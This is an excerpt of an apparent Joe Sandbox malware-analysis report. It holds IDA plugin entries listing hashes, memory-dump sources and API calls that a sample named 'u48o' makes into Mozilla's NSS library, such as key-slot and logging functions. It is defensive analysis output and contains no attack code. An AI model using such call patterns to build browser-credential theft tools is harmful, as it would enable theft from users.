                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastbind
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2328862993-0
                                                                                                                                                                                                                                              • Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                                                                                                                                                                              • Instruction ID: 0b8e13d26e9b4b5a7187d218417e5541f71e6a7e5bd95de8e0181d2dc1db0a88
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AE01D362501146FCF05DF74DC45C7A37A9DF4822C790C524F919C76B1EA35D5658BD0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9ffb4ece94aa5c7601ba860dcf46370291093adf0e7d9edc5be2f409cfd69fc5
                                                                                                                                                                                                                                              • Instruction ID: 3b956682fe59d55e230a7bdc2e25143081fba7bb2f0c9071d31c9a9830439643
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ffb4ece94aa5c7601ba860dcf46370291093adf0e7d9edc5be2f409cfd69fc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D11C1747043599FCB00EF29C8C066A77B5FF89368F14806AD8198F701DB72E806CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 673e5c2d2e319813d6f4ce89e6577dfed71d287edd2526c0cf0e1aecbac37c16
                                                                                                                                                                                                                                              • Instruction ID: 5f8d63df1bd16ddff4ef17360cfebefeb347681f949bd73474d9407ebd5e660f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 673e5c2d2e319813d6f4ce89e6577dfed71d287edd2526c0cf0e1aecbac37c16
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A1109B6E002199F8B00DF99D8809EFBBF9EF8C664B554429ED58E7300D231ED118BE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f4f78737c1e639d82cdf58bad2c0ecaa6bd422971e67329f87c5c926c6386f58
                                                                                                                                                                                                                                              • Instruction ID: a1b145419b59782381c8ba3a7fb1e907117a047f0aa34523f7eb8608b1b0a58c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4f78737c1e639d82cdf58bad2c0ecaa6bd422971e67329f87c5c926c6386f58
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C11C976A002199F9B00DF59C8809EFB7F9EF4C214B56416AED58E7301D631ED118BE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                              • Instruction ID: 09228e5aedd1eda5b7ba5b8c414a5f77f87e3b02855552e7e79ca2326dcd3ef1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88E06D3A202064A7DB148E09C450AAA7369DF89619FE4807ACC999BB01DA73F8039B91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                              • Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374C50
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374C5B
                                                                                                                                                                                                                                              • PR_smprintf.NSS3(6C44AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374C76
                                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374CAE
                                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C374CC9
                                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C374CF4
                                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C374D0B
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374D5E
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374D68
                                                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C374D85
                                                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C374DA2
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C374DB9
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C374DCF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                              • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                              • Opcode ID: 607222da188067d011712df47a989fde7a6703b1f1d68de2604eed1878a83e25
                                                                                                                                                                                                                                              • Instruction ID: 5a5b1eef4df2bf1ea905e2cbc59fe0b03fbf2a31798794b112bcf5419c020562
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 607222da188067d011712df47a989fde7a6703b1f1d68de2604eed1878a83e25
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6418FB1910185A7EB22EF159C81EBA7A69AF8230CF158124EC1557702E73AE914CFF7
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C356943
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C356957
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C356972
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C356983
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C3569AA
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C3569BE
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C3569D2
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C3569DF
                                                                                                                                                                                                                                                • Part of subcall function 6C356910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C356A5B
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C356D8C
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C356DC5
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356DD6
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356DE7
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C356E1F
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356E4B
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356E72
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356EA7
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356EC4
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356ED5
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C356EE3
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356EF4
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356F08
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C356F35
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356F44
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C356F5B
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C356F65
                                                                                                                                                                                                                                                • Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C35781D,00000000,6C34BE2C,?,6C356B1D,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C40
                                                                                                                                                                                                                                                • Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C35781D,?,6C34BE2C,?), ref: 6C356C58
                                                                                                                                                                                                                                                • Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C6F
                                                                                                                                                                                                                                                • Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C356C84
                                                                                                                                                                                                                                                • Part of subcall function 6C356C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C356C96
                                                                                                                                                                                                                                                • Part of subcall function 6C356C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C356CAA
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356F90
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356FC5
                                                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6C356FF4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                              • String ID: +`6l
                                                                                                                                                                                                                                              • API String ID: 1304971872-3552083973
                                                                                                                                                                                                                                              • Opcode ID: df9bd685f1f8f2181a785efa04bfcfaddd8e9ac072d3e0a74eb4b65b2cc6982f
                                                                                                                                                                                                                                              • Instruction ID: e9a3633eecbaa04c5a5795efef6abd2312cb99f947af01a8d0f713c3ffd3ad41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df9bd685f1f8f2181a785efa04bfcfaddd8e9ac072d3e0a74eb4b65b2cc6982f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07B16DB0E022099FEF00DBA5D985F9EBBB8AF05348F540124E815E7741E732E924CFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C352DEC
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C352E00
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C352E2B
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C352E43
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C324F1C,?,-00000001,00000000,?), ref: 6C352E74
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C324F1C,?,-00000001,00000000), ref: 6C352E88
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C352EC6
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C352EE4
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C352EF8
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C352F62
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C352F86
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C352F9E
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C352FCA
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C35301A
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C35302E
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C353066
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C353085
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C3530EC
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C35310C
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C353124
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C35314C
                                                                                                                                                                                                                                                • Part of subcall function 6C339180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C36379E,?,6C339568,00000000,?,6C36379E,?,00000001,?), ref: 6C33918D
                                                                                                                                                                                                                                                • Part of subcall function 6C339180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C36379E,?,6C339568,00000000,?,6C36379E,?,00000001,?), ref: 6C3391A0
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007AD
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007CD
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007D6
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C29204A), ref: 6C3007E4
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,6C29204A), ref: 6C300864
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C300880
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,6C29204A), ref: 6C3008CB
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008D7
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008FB
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C35316D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3383223490-0
                                                                                                                                                                                                                                              • Opcode ID: 8effb218172725647a6a73da12e7e60d453b29c06bcb7039cc8453ece9dcdd73
                                                                                                                                                                                                                                              • Instruction ID: 6f255e2c1ef2ab9f10e7af7e1ac62b21b624b004a6e1096e774a55b75bacdd63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8effb218172725647a6a73da12e7e60d453b29c06bcb7039cc8453ece9dcdd73
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51F19DB1E002189FDF00EF64D884BAABBB4BF09318F544169EC45A7711E732A9A5CF91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_Digest), ref: 6C346D86
                                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C346DB4
                                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C346DC3
                                                                                                                                                                                                                                                • Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C346DD9
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C346DFA
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C346E13
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C346E2C
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C346E47
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C346EB9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
